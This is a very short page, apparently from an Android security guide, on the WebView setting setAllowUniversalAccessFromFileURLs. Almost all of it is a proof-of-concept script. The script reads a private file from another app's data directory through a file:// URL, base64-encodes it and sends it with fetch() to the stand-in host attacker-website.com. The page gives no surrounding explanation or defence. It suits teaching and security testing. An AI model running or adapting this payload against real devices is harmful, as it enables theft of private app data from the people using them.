WebSettings Vulnerabilities
WebSettings overview
Security issues
setAllowUniversalAccessFromFileURLs
<!-- file:///sdcard/index.html -->
<script>
var url = 'file:///data/data/com.victim.app/internal_folder/private_file.txt';
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
fetch('https://attacker-website.com/?content=' + btoa(xhr.responseText));
}
}
xhr.open('GET', url, true);
xhr.send('');
</script>Last updated